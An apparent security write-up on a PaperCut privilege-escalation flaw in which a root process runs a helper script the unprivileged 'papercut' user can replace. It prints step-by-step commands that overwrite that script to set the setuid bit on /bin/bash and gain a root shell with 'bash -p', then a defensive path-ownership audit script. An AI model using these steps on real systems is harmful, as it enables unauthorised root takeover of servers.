
A security researcher has uncovered a local privilege-escalation flaw in PaperCut print-management software that lets a low-privileged account on the print server gain root.
Martin Mielke, a security researcher, was probing PaperCut version 22.0.12, the latest release at the time, installed on an Ubuntu 22.04 system.
Mielke's installation was unassuming: the software was installed under a low-privileged Linux account named 'papercut'. The crux of the issue lies in how PaperCut runs a helper script on behalf of its web application. Mielke found that logging into the admin panel on port 9191 and opening a particular page caused the application to run a command as root, even though the software and its files belonged to the unprivileged 'papercut' account.
The privilege escalation is possible because of how that command is executed (`/bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key`). The script lives inside the home directory of the 'papercut' user, so that account can replace it with any binary or shell script, and the application will then run the replacement as root.
Mielke replaced the 'server-command' file with a script that sets the setuid bit on /bin/bash. Once the application runs that script as root, /bin/bash is setuid root, and the 'papercut' user can start a root shell with `bash -p` (the -p flag stops bash from dropping the elevated effective UID) and run any command with root privileges, effectively elevating the low-privileged 'papercut' user to root.
The implications are alarming. The finding highlights a significant oversight in PaperCut's security architecture and underscores the risk of seemingly benign helper components that a privileged process executes from an unprivileged user's directory. The vulnerability, reported to the vendor six months earlier, remained unaddressed in the then-current release (23.0.3), raising concerns about the pace of security updates in critical software.
To reproduce the attack, run the following commands as the low-privileged 'papercut' user; the replacement script runs as root the next time the admin panel invokes server-command:
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#
. `dirname $0`/.common
export CLASSPATH
${JRE_HOME}/bin/java \
-Djava.io.tmpdir=${TMP_DIR} \
-Dserver.home=${SERVER_HOME} \
-Djava.awt.headless=true \
-Djava.locale.providers=COMPAT,SPI \
-Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
-Xverify:none \
biz.papercut.pcng.server.ServerCommand \
"$@"
papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash
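The root cause above is a file that a root process executes but that sits inside a tree an unprivileged account owns. The following POSIX shell script is an added example, not part of Mielke's write-up and not PaperCut's own tooling: it walks every path component of a given executable and reports any that is not root-owned or is group/world-writable, which is the check an administrator would run against the wrapper path quoted above. It assumes GNU coreutils stat, as shipped on Ubuntu 22.04; the function name, messages and exit codes are this example's own.

```shell
#!/bin/sh
# Added example (not from the original write-up or from PaperCut): audit whether
# an executable that a root process invokes sits anywhere a non-root account
# could replace it. Assumes GNU coreutils stat (Ubuntu 22.04).
# Exit status: 0 = every component root-owned and not group/world-writable,
#              1 = at least one weak component, 2 = the path does not exist.

check_root_exec_path() {
    # Make the path absolute so the walk always terminates at "/".
    case $1 in
        /*) cur=$1 ;;
        *)  cur=$PWD/$1 ;;
    esac
    weak=0
    while :; do
        # -L follows symlinks, so a root-owned link pointing into a user-owned
        # tree is judged by its target. %U = owner name, %A = symbolic mode.
        owner=$(stat -L -c '%U' "$cur" 2>/dev/null) || {
            echo "missing: $cur"
            return 2
        }
        perm=$(stat -L -c '%A' "$cur")
        if [ "$owner" != root ]; then
            # The owner can chmod or replace the file whatever its current mode.
            echo "weak: $cur is owned by $owner, not root"
            weak=1
        fi
        # In symbolic mode (e.g. drwxrwxrwx) the 6th character is the group
        # write bit and the 9th is the world write bit.
        case $perm in
            ?????w*|????????w*)
                echo "weak: $cur is group/world-writable ($perm)"
                weak=1 ;;
        esac
        [ "$cur" = / ] && break
        cur=$(dirname "$cur")
    done
    return "$weak"
}

# Command-line use:
#   sh audit.sh /home/papercut/server/bin/linux-x64/server-command
if [ -n "$1" ]; then
    check_root_exec_path "$1"
fi
```

On the installation described above, the components under /home/papercut would be reported as owned by papercut. A clean result is necessary but not sufficient: the wrapper also sources `.common` from the same directory and launches a JRE from `${JRE_HOME}`, so those files need the same check, and a world-writable directory with the sticky bit set (such as /tmp) is still reported because a root process should not be executing from it at all.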